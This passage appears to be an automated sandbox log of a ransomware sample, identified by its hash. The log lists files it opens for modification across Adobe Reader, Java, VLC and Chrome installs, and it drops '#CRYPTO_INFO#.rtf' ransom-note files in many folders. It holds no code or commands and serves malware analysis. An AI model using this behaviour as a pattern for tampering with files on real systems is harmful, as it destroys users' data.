DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ko_KR.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\tool-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_200_percent.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-awt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javacpl.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ko_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\vi_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-search.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\EnableDismount.AAC 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_ko.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\sysinfo.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg 